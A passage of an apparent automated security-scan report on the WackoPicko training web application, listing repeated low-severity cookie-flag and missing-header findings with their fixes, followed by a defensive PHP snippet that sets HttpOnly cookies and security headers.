www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Password Autocomplete in browser

Description

The AUTOCOMPLETE attribute is not disabled on the HTML FORM/INPUT element containing a password-type input. Passwords may be stored in the browser and retrieved.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
input
Attack
<input type="password" name="password" />

Solution

Turn off the AUTOCOMPLETE attribute on the form, or on the individual input elements containing passwords, by using AUTOCOMPLETE='OFF'.

Reference

http://msdn.microsoft.com/library/default.asp?url=/workshop/author/forms/autocomplete_ovr.asp

CWE Id

525

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/passcheck.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/passcheck.php

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=qpjgsk8us4l50vral51ngb4rf2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555
Parameter
PHPSESSID=1vljoojisdmba2cbi6p1dt3jr1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=ams4005b4lt85uijq7j1ce9ag3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=dhi19to079ulv4k1g6k6g8cvt6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955
Parameter
PHPSESSID=uglpu7h37jrtlfmcpqsn7avp25; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355
Parameter
PHPSESSID=u4mims6bklah44t7ufatmuiak6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755
Parameter
PHPSESSID=lb6u9cdc9gce6no9uop5on59l7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155
Parameter
PHPSESSID=pksol2i7ru6l9pc442ujadkiv7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555
Parameter
PHPSESSID=126fkl17ufn46ub2jqkore52b1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955
Parameter
PHPSESSID=d2uia8euo7u98bs21l9sr27h30; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355
Parameter
PHPSESSID=b61ngeffpbsrebphofvtcfm9j6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755
Parameter
PHPSESSID=k197ba37mfe5lvhp4tgn9phjr0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header, and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755

Solution

Most modern web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID=3mohpqirn3nk70a0lm4ske75g4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID=ldp4qva76rd4ke0pnsaf7aklc7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID=5c83beff26riqjtq6bvro1vk31; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID=4392nvgirojuib83t28os8u6t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=1mo5jljof4na8tvk4c9vkehm21; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=52amksqtfqudg4eh1jbml937s1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=5j3s7se1hlmegl2it45nv398j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID=qg9ipoh1isesuvqsdn6hj4q4e7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID=6eb9uqu6nd666n0jqihfi071c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=fteba9bo1n02h7o141ihssc800; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID=5evej6j8ho0rq8360hkhm27f60; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID=pnlm23qlq3vd5ue2pp9dbc1qa5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID=09q1ejn1ufrtfertf46icr3rm7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID=2itu2rss1s4shc8vqjndr2cp73; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID=v4b3btdaicrs9he0auofj7kli6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID=9vdc0gtnjob27mq4e7t2dtaps6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID=0krgplrptcak9at37aig3s4gl5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID=kmrdnsm3pi6mtnhp3tjegpqga6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID=nbrnqpesbiqrmjb9afk8mmoqb0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID=n9tg7ja8ak6l6eghcfbdq7r137; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID=p0u1muql1jjncpu85g1dc3c9h1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID=bf1prcesrtampsk6q97a3t5h01; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID=ob0v4pahncba1ar6uetpu58414; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=2p836015asgugqva4g3tdei0o0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID=bhjkvjmqb6kqgr2jpps7il2sf0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616
Parameter
PHPSESSID=qonl4ojkvrqg43g62jrnca9bd3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true
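The three findings above (a session cookie without HttpOnly, X-Content-Type-Options missing, X-Frame-Options not set) recur for every URL in this report because they are properties of the application's response pipeline, not of any one page; they are fixed once, in the code that runs before any output, and verified once against a captured response. The following is an added example and not WackoPicko's code: a PHP 7.4+ bootstrap that sets the cookie flags and headers, and an auditor that reproduces the three checks on raw header lines. The sample responses are constructed for the demonstration.

```php
<?php
// Added example (not WackoPicko code): the response hardening that clears the
// three header/cookie findings above, plus a small auditor that reproduces the
// scanner's checks against a captured response. Sample headers are constructed.

declare(strict_types=1);

// --- Fix: call before session_start() and before any output ------------------
function harden_response(bool $https): void
{
    // Session cookie: HttpOnly keeps document.cookie from reading PHPSESSID;
    // Secure (when served over TLS) keeps it off plaintext HTTP; SameSite=Lax
    // limits cross-site sending. The array form needs PHP 7.3+.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => $https,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    // Equivalent php.ini settings: session.cookie_httponly = 1,
    // session.cookie_secure = 1, session.cookie_samesite = Lax.

    header('X-Content-Type-Options: nosniff');
    header('X-Frame-Options: DENY');
    // CSP frame-ancestors is the modern replacement for X-Frame-Options;
    // sending both keeps older browsers covered.
    header("Content-Security-Policy: frame-ancestors 'none'");
}

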